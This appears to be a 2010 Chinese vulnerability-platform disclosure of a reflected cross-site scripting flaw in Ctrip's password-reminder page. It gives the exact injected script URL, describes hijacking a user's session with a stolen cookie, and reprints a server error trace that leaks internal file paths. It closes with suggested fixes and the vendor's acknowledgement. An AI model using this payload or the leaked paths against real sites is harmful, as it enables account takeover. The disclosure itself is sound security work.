携程网跨站弱点及物理路径泄漏

http://www.ctrip.com/Member/RemindPWD.asp?email=&uid=&signin_logintype=&done=此处存在跨站，可窃取用户cookie。我模拟行为窃取某用户的cookie后使用该cookie成功登录携程。在仿冒cookie的过程中，引起了aspx的服务器错误，导致物理路径泄漏。

1.xss http://www.ctrip.com/Member/RemindPWD.asp?email=&uid=&signin_logintype=&done=">%3Cscript%3Ealert%28/document.cookie/%29%3C/script%3E2.physical“/myctrip”应用程序中的服务器错误。未将对象引用设置到对象的实例。说明: 执行当前 Web 请求期间，出现未处理的异常。请检查堆栈跟踪信息，以了解有关该错误以及代码中导致错误的出处的详细信息。异常详细信息: System.NullReferenceException: 未将对象引用设置到对象的实例。源错误:执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。堆栈跟踪:[NullReferenceException: 未将对象引用设置到对象的实例。]Ctrip.Common.Utility.UserAuth.CheckUserToken(String tokenString) in D:\CtripCode\SystemSolution\ADSystem\Ctrip.BaseFramework\BaseFramework\Utility\Utility\UserAuth.cs:32Customer.MyCtrip.Presenter.BaseIPage.GetUserProfile() in a:\CtripSolution\Customer\MAINLINE\Customer\MyCtripSolution\PresenterLayer\Presenter\Customer.MyCtrip.Presenter\BaseClass\BaseIPage.cs:208Customer.MyCtrip.Presenter.SecureBaseIPage.OnLoad(EventArgs e) in a:\CtripSolution\Customer\MAINLINE\Customer\MyCtripSolution\PresenterLayer\Presenter\Customer.MyCtrip.Presenter\BaseClass\SecureBaseIPage.cs:27System.Web.UI.Control.LoadRecursive() +47System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1436

1、过滤关键字2、设置cookie路径

厂商回应：

危害等级：中

漏洞Rank：3

确认时间：2010-07-22 18:07

厂商回复：

感谢感谢，正在修复中

最新状态：

暂无

1. 2010-01-01 00:00 he1renyagao 白帽子 | Rank:224 漏洞数:28)

   mark